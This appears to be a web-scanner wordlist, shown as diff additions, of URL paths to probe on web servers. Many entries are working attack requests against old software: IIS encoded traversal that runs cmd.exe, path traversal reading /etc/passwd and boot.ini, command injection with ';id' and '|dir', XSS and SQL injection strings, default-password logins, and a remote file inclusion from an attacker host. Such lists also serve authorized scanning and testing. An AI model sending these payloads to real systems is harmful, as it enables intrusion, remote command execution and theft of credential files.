+exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+exchange/lib/AMPROPS.INC
+exchange/lib/ATTACH.INC
+exchange/lib/DELETE.INC
+exchange/lib/GETREND.INC
+exchange/lib/GETWHEN.INC
+exchange/lib/JSATTACH.INC
+exchange/lib/JSROOT.INC
+exchange/lib/JSUTIL.INC
+exchange/lib/LANG.INC
+exchange/lib/PAGEUTIL.INC
+exchange/lib/PUBFLD.INC
+exchange/lib/RENDER.INC
+exchange/lib/SESSION.INC
+exchange/lib/logon.inc
+exchange/root.asp?acs=anon
+exec/show/config/cr
+ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
+ext.ini.%00.txt
+extcounter.pl
+ez2000/ezadmin.cgi
+ez2000/ezboard.cgi
+ez2000/ezman.cgi
+ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
+faqman/index.php
+fdispaly.cgi
+fdisplay.cgi
+fforum/
+file/index.jsp
+filemanager/filemanager_forms.php
+filemanager/index.php3
+filemgmt/brokenfile.php
+filemgmt/singlefile.php
+filemgmt/viewcat.php
+filemgmt/visit.php
+finance.xls
+finances.xls
+foo.php3
+foro/YaBB.pl
+forum-ra.asp?n=/.\
+forum-ra_professionnel.asp?n=/.\
+forum.asp?n=/.\
+forum/admin/database/wwForum.mdb
+forum/admin/wwforum.mdb
+forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+forum/common.php
+forum/mainfile.php
+forum/member.php
+forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\
+forum/newreply.php
+forum/newthread.php
+forum/viewtopic.php
+forum1.asp?n=/.\
+forum1_professionnel.asp?n=/.\
+forum_arc.asp?n=/.\
+forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
+forum_professionnel.asp?n=/.\
+forums/@ADMINconfig.php
+forums/config.php
+forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+fpdb/shop.mdb
+fs
+ftp/
+functions.inc.php+
+fx
+gallery/captionator.php
+ganglia/
+gb/index.php?login=true
+geeklog/users.php
+general.chl+
+get_od_toc.pl
+getaccess
+getfile.cfm
+girl/
+girls/
+giwrap
+glimpse
+global
+global.asa
+global.asa+.htr
+global.inc
+globals.jsa
+globals.php3
+globals.pl
+group.nsf
+groups.nsf
+guest.exe
+guestbook/admin.php
+guestbook/admin/o12guest.mdb
+guestbook/guestbook.html
+guestbook/guestbookdat
+guestbook/pwd
+head.css
+help.html
+help/contents.htm
+help/domguide.nsf
+help/dspug.nsf
+help/help4.nsf
+help/helpadmin.nsf
+help/helplt4.nsf
+help/home.html
+help/internet.nsf
+help/javapg.nsf
+help/lccon.nsf
+help/migrate.nsf
+help/npn_admn.nsf
+help/npn_rn.nsf
+help/readmec.nsf
+help/readmes.nsf
+help/smhelp.nsf
+help/srvinst.nsf
+help4.nsf
+help5_admin.nsf
+help5_client.nsf
+help5_designer.nsf
+helpadmin.nsf
+helperfunction.php
+helplt4.nsf
+hf
+hidden.nsf
+hire/
+hola/admin/cms/htmltags.php?datei=./sec/data.php
+home.php?arsc_language=elvish
+homebet/homebet.dll?form=menu&amp;option=menu-signin
+homepage.nsf
+horde/imp/test.php
+horde/test.php
+horde/test.php?mode=phpinfo
+hostadmin/?page='
+hostingcontroller/
+hosts.dat
+hp
+ht_root/wwwroot/-/local/httpd$map.conf
+htdocs/
+htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+html
+html/cgi-bin/cgicso?query=AAA
+html/snort2html.html
+htmltonuke.php
+htpasswd
+iNotes/Forms5.nsf
+iNotes/Forms5.nsf/$DefaultNav
+icons/
+ics
+idea/
+idealbb/error.asp?|-|0|404_Object_Not_Found
+ideas/
+iew-source
+iisadmin 
+iisadmin/
+iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ 
+iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
+iisadmpwd/achg.htr
+iisadmpwd/aexp.htr
+iisadmpwd/aexp2.htr
+iisadmpwd/aexp2b.htr
+iisadmpwd/aexp3.htr
+iisadmpwd/aexp4.htr
+iisadmpwd/aexp4b.htr
+iisadmpwd/anot.htr
+iisadmpwd/anot3.htr
+iisamples/Sdk 
+iishelp/iis/misc/iirturnh.htw
+iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
+iissamples 
+iissamples/Default 
+iissamples/ExAir 
+iissamples/ISSamples 
+iissamples/exair/howitworks/Code.asp
+iissamples/exair/howitworks/Codebrw1.asp
+iissamples/exair/howitworks/Winmsdp.exe
+iissamples/exair/howitworks/code.asp
+iissamples/exair/howitworks/codebrws.asp
+iissamples/exair/howitworks/showcode.asp
+iissamples/exair/search/advsearch.asp
+iissamples/exair/search/qfullhit.htw
+iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
+iissamples/exair/search/qsumrhit.htw
+iissamples/exair/search/query.asp
+iissamples/exair/search/query.idq
+iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/exair/search/search.asp
+iissamples/exair/search/search.idq
+iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/iissamples/query.asp
+iissamples/issamples/SQLQHit.asp
+iissamples/issamples/Winmsdp.exe
+iissamples/issamples/codebrws.asp
+iissamples/issamples/fastq.idq
+iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/ixqlang.htm
+iissamples/issamples/oop/qfullhit.htw
+iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/oop/qsumrhit.htw
+iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/query.asp
+iissamples/issamples/query.idq
+iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/sqlqhit.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+iissamples/sdk/asp/docs/Winmsdp.exe
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+iissamples/sdk/asp/docs/codebrw2.asp
+iissamples/sdk/asp/docs/codebrws.asp
+ilemail.pl
+iles.pl
+image/
+images/
+images/?pattern=/etc/*&sort=name
+img-sys/
+img/
+imp/horde/test.php
+imp/horde/test.php?mode=phpinfo
+imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
+imprimer.asp?no=/.\
+in
+inc/
+inc/common.load.php
+inc/config.php
+inc/dbase.php
+inc/sendmail.inc
+include.php?path=contact.php&contact_email=\
+include/
+include/css.css
+include/customize.php
+include/head.html
+include/help.php
+include/inc/
+include/oci8.php?inc_dir=<a class=
+includes/
+includes/footer.php3
+includes/global.inc
+includes/header.php3
+index.JSP
+index.asp%2e
+index.asp%2e%41sp
+index.asp%81
+index.asp+.htr
+index.asp.
+index.asp::$DATA
+index.asp\\
+index.html%20
+index.html.bak
+index.html.ca
+index.html.cz.iso8859-2
+index.html.de
+index.html.dk
+index.html.ee
+index.html.el
+index.html.en
+index.html.es
+index.html.et
+index.html.fr
+index.html.he.iso8859-8
+index.html.hr.iso8859-2
+index.html.it
+index.html.ja.iso2022-jp
+index.html.kr.iso2022-kr
+index.html.ltz.utf8
+index.html.lu.utf8
+index.html.nl
+index.html.nn
+index.html.no
+index.html.po.iso8859-2
+index.html.pt
+index.html.pt-br
+index.html.ru.cp-1251
+index.html.ru.cp866
+index.html.ru.iso-ru
+index.html.ru.koi8-r
+index.html.ru.utf8
+index.html.se
+index.html.tw
+index.html.tw.Big5
+index.html.var
+index.html~
+index.js%2570
+index.jsp%00x
+index.php.bak
+index.php/123
+index.php/\
+index.php3.%5c../..%5cconf/httpd.conf
+index.php3?vhosts[test]=
+index.php?IDAdmin=test
+index.php?SqlQuery=test%20
+index.php?action=search&searchFor=\
+index.php?base=test%20
+index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
+index.php?download=/etc/passwd
+index.php?download=/windows/win.ini
+index.php?download=/winnt/win.ini
+index.php?file=Liens&op=\
+index.php?file=index.php
+index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
+index.php?module=My_eGallery
+index.php?page=../../../../../../../../../../boot.ini
+index.php?page=../../../../../../../../../../etc/passwd
+index.php?pymembs=admin
+index.php?sql_debug=1
+index.php?tampon=test%20
+index.php?vo=
+index.php?|=../../../../../../../../../etc/passwd
+index.php~
+infos/contact/index.asp
+infos/faq/index.asp
+infos/gen/index.asp
+infos/services/index.asp
+inger
+instaboard/index.cfm
+install/
+instantwebmail/message.php
+interchange/
+internal.sws?../../winnt/win.ini
+internet.nsf
+interscan/
+interscan/cgi-bin/FtpSave.dll?I'm%20Here
+intranet/browse.php
+invitefriends.php3
+ip.txt
+ipchat.php
+isapi/count.pl?
+isapi/tstisapi.dll
+isc
+isqlplus
+ix
+ixmail_netattach.php
+j
+jamdb/
+java-plugin/
+java-sys/
+javadoc/
+javapg.nsf
+javax
+jgb_eng_php3/cfooter.php3
+jigsaw/
+jotter.nsf
+jservdocs/
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
+jspdocs/
+jsptest.jsp+
+junk.aspx
+k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
+kbccv11.nsf
+kbnv11.nsf
+kboard/
+kbssvv11.nsf
+kernel/class/delete.php
+kernel/classes/ezrole.php
+krysalis/
+kstats
+l_domlog.nsf
+lassifieds.cgi
+lccon.nsf
+lcgi/lcgitest.nlm
+lcgi/ndsobj.nlm
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
+lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
+lcon.nsf
+ld
+ldap.nsf
+ldap.search.php3?ldap_serv=nonsense%20
+leiadm.nsf
+leilog.nsf
+leivlt.nsf
+level/42/exec/show%20conf
+limpse
+lists/admin/
+livredor/index.php
+local/httpd$map.conf
+localstart.asp
+log.cgi
+log.htm
+log.html
+log.nsf
+log.php
+log.php3
+log.shtml
+log.txt
+log4a.nsf
+logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
+logfile
+logfile.htm
+logfile.html
+logfile.txt
+logger.html
+logicworks.ini
+login.asp%3F+.htr
+login.jsp
+login.php3?reason=chpass2%20
+login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
+login/sm_login_screen.php?error=\
+login/sm_login_screen.php?uid=\
+logins.html
+logjam/showhits.php
+logs.htm
+logs.html
+logs.php
+logs.php3
+logs.shtml
+logs/access_log
+lpt9
+lpt9.xtp
+lsxlc.nsf
+mab.nsf
+mail.box
+mail/adminisist.nsf
+mail/include.html
+mail/settings.html
+mail/src/read_body.php
+mail1.box
+mail10.box
+mail2.box
+mail3.box
+mail4.box
+mail5.box
+mail6.box
+mail7.box
+mail8.box
+mail9.box
+mailman/admin/ml-name?\
+mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
+mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
+mailw46.nsf
+main.asp%2e
+main.asp%2e%41sp
+main.asp%81
+main.asp+.htr
+main.asp.
+main.asp::$DATA
+main.asp\\
+main_page.php
+mall_log_files/order.log
+mambo/administrator/phpinfo.php
+mambo/banners.php
+mambo/index.php?Itemid=JUNK(5)
+manage/cgi/cgiproc
+manage/login.asp+
+mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
+manual.php
+manual/ag/esperfrm.htm
+manual/images/
+manual/servlets/scripts/servlet1/servform.htm
+manual/servlets/scripts/shoes/shoeform.htm
+market/
+master.password
+mc-icons/
+mcartfree/database/metacart.mdb
+megabook/files/20/setup.db
+members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
+members/ID.pm
+members/ID.xbb
+metacart/database/metacart.mdb
+mg
+mgs
+midicart.mdb
+migrate.nsf
+mlog.html
+mlog.phtml
+mod.php
+mod_ose_docs
+modif/delete.php
+modif/ident.php
+modif_infos.asp?n=%60/etc/passwd%60
+modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
+modif_infos.asp?n=../../../../../../../../../etc/passwd%00
+modif_infos.asp?n=/....../boot.ini
+modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
+modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
+modif_infos.asp?n=/../../../../../../../../../etc/passwd
+modif_infos.asp?n=/.\
+modif_infos.asp?n=/etc/passwd
+modif_infos.asp?n=/etc/passwd%00
+modif_infos.asp?n=c:\boot.ini
+modsecurity.php
+modules.php?name=Downloads&d_op=viewdownload
+modules.php?name=Members_List&letter=All&sortby=pass
+modules.php?name=Members_List&sql_debug=1
+modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+modules.php?op=modload&name=0&file=0
+modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
+modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
+modules/Downloads/voteinclude.php+
+modules/Forums/attachment.php
+modules/Forums/bb_smilies.php?bgcolor1=\
+modules/Search/index.php
+modules/WebChat/in.php+
+modules/WebChat/out.php
+modules/WebChat/quit.php
+modules/WebChat/users.php
+modules/Your_Account/navbar.php+
+moregroupware/modules/webmail2/inc/
+mp3/
+mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
+mrtg/
+msadc
+msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
+msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+msadc/..%%35c../winnt/system32/cmd.exe?/c+dir
+msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir
+msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+msadc/..%255c../winnt/system32/cmd.exe?/c+dir
+msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+msadc/..%u002f../winnt/system32/cmd.exe?/c+dir
+msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+msadc/..%u005c../winnt/system32/cmd.exe?/c+dir
+msadc/../../../../winnt/system32/cmd.exe?/c+dir
+msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
+msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ 
+msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir
+msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\
+msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir
+msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
+msadc/.._../winnt/system32/cmd.exe?/c+dir
+msadc/Samples/SELECTOR/codebrws.cfm
+msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
+msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
+msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+msadc/msadcs.dll
+msadc/samples/adctest.asp
+msadc/samples/selector/showcode.asp
+msadc/samples/selector/showcode.asp_2
+msadm/domain/index.php3?account_name=\
+msadm/site/index.php3?authid=\
+msadm/user/login.php3?account_name=\
+msads/Samples/SELECTOR/showcode.asp
+msdac/root.exe?/c+dir+c:\ 
+msdwda.nsf
+mspress30/
+msql/
+mtatbls.nsf
+mtdata/mtstore.nsf
+mtstore.nsf
+musicqueue.cgi
+myguestBk/add1.asp?|-|0|404_Object_Not_Found
+myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
+myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
+myinvoicer/config.inc
+mylog.phtml?screen=/etc/passwd
+myphpnuke/links.php
+mysql/
+mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+nForm2
+na_admin/
+names.nsf
+nbform.cgi
+ncl_items.html
+ncl_items.html?SUBJECT=2097
+ncl_items.shtml?SUBJECT=1
+ncludes
+netbasic/websinfo.bas
+netget?sid=Safety&amp;msg=2002&amp;file=Safety
+netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
+netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
+nethome/
+news/news.mdb
+newtopic.php
+newuser?Image=../../database/rbsserv.mdb
+nfo
+nfo2www
+nikto.ida
+nlg1.1
+nntp/nd000000.nsf
+nntp/nd000001.nsf
+nntp/nd000002.nsf
+nntp/nd000003.nsf
+nntp/nd000004.nsf
+nntppost.nsf
+node/view/666\
+nofile.pl
+notes.nsf
+nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
+nphp/nphpd.php
+npn_admn.nsf
+npn_rn.nsf
+ns-icons/
+nsn/..%5Cutil/dir.bas
+nsn/..%5Cutil/dsbrowse.bas
+nsn/..%5Cutil/slist.bas
+nsn/env.bas
+nsn/fdir.bas
+nsn/fdir.bas:ShowVolume
+nternal
+ntsync4.nsf
+ntsync45.nsf
+nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+nul..cfm
+nul..dbm
+nul.cfm
+nul.dbm
+null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
+null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
+null.ida
+null.idc
+null.idq
+number/
+nviron.cgi
+nyForm2
+oc/Search/SQLQHit.asp
+oc/Search/sqlqhit.asp
+ode
+oekaki/
+oem_webstage/cgi-bin/oemapp_cgi
+oem_webstage/oem.conf
+officescan/cgi/cgiChkMasterPwd.exe
+officescan/cgi/jdkRqNotify.exe
+officescan/hotdownload/ofscan.ini
+ojspdemos/basic/hellouser/hellouser.jsp
+ojspdemos/basic/simple/usebean.jsp
+ojspdemos/basic/simple/welcomeuser.jsp
+onspass.chl+
+open?
+opendir.php?/etc/passwd
+opendir.php?requesturl=/etc/passwd
+oprocmgr-status
+options.inc.php+
+order/order.log
+order/order_log.dat
+order/order_log_v12.dat
+orders/checks.txt
+orders/import.txt
+orders/mountain.cfg
+orders/order.log
+orders/order_log.dat
+orders/order_log_v12.dat
+orders/orders.txt
+oscommerce/default.php
+ows-bin/oaskill.exe?abcde.exe
+ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
+ows-bin/perlidlc.bat?&dir
+ows/restricted%2eshow
+pafiledb/includes/team/file.php
+page.cgi?../../../../../../../../../../etc/passwd
+pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+parse_xml.cgi
+pass.txt
+pass_done.php
+passwd
+passwd.txt
+passwdfile
+password
+password.dat
+password.inc
+password.log
+password.txt
+passwords.txt
+path/nw/article.php?id='
+pbserver/
+pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+pbserver/pbserver.dll
+pccsmysqladm/incs/dbconnect.inc
+pds/
+people.lst
+perl
+perl/
+perl/-e%20%22system('cat%20/etc/passwd');\%22
+perl/-e%20print%20Hello
+perl/env.pl
+perl/files.pl
+perl/samples/env.pl
+perl/samples/lancgi.pl
+perl/samples/ndslogin.pl
+perl/samples/volscgi.pl
+perl5/files.pl
+perweb.nsf
+pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
+ph-publish
+ph-test-cgi
+phorum/admin/stats.php
+photo/manage.cgi
+photo_album/
+photodata/manage.cgi
+php-coolfile/action.php?action=edit&file=config.php
+php.cgi
+php.ini
+php/device/this.LCDispatcher
+php/gaestebuch/admin/index.php
+php/index.php
+php/mlog.phtml
+php/mylog.phtml?screen=/etc/passwd
+php/php.exe?c:\boot.ini
+php/php.exe?c:\winnt\boot.ini
+php/php4ts.dll
+phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+phpBB/phpinfo.php
+phpBB/viewtopic.php?t=17071&highlight=\
+phpBB2/includes/db.php
+phpBB2/search.php?search_id=1\
+phpEventCalendar/file_upload.php
+phpimageview.php?pic=javascript:alert('Vulnerable')
+phpinfo.php
+phpinfo.php3
+phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
+phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
+phprocketaddin/?page=../../../../../../../../../../boot.ini
+phprocketaddin/?page=../../../../../../../../../../etc/passwd
+phpshare/phpshare.php
+phptonuke.php?filnavn=/etc/passwd
+phpwebfilemgr/index.php?f=../../../../../../../../../etc
+phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
+phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\
+phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
+phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\
+phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\
+phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\
+ping
+pks/lookup
+ploader.exe
+pls/admin
+pls/portal30/admin_/
+pls/sample/admin_/help/..%255cplsql.conf
+pls/simpledad/admin_/
+pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
+pls/simpledad/admin_/dadentries.htm
+pls/simpledad/admin_/gateway.htm?schema=sample
+pls/simpledad/admin_/globalsettings.htm
+pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
+pm/lib.inc.php
+pmlite.php
+pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
+poppassd.php3+
+porn/
+postnuke/html/index.php?module=My_eGallery
+postnuke/index.php?module=My_eGallery
+postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\
+powerportal/
+pp.php?action=login
+pr0n/
+prd.i/pgen/
+private
+private.nsf
+process_bug.cgi
+produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
+product_info.php
+productcart/database/EIPC.mdb
+productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
+profile.php?u=JUNK(8)
+project/index.php?m=projects&user_cookie=1
+prometheus-all/index.php
+pron/
+proplus/admin/login.php+-d+\
+protected/
+protected/secret.html+
+protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
+protection.php
+proxy/ssllogin?user=administrator&password=administrator
+proxy/ssllogin?user=administrator&password=operator
+proxy/ssllogin?user=administrator&password=user
+prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+pt_config.inc
+pub/english.cgi?op=rmail
+public.nsf
+publisher/
+put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
+pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
+pvote/ch_info.php?newpass=password&confirm=password%20
+pvote/del.php?pollorder=1%20
+pw/storemgr.pw
+pwd.db
+python
+qpadmin.nsf
+query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
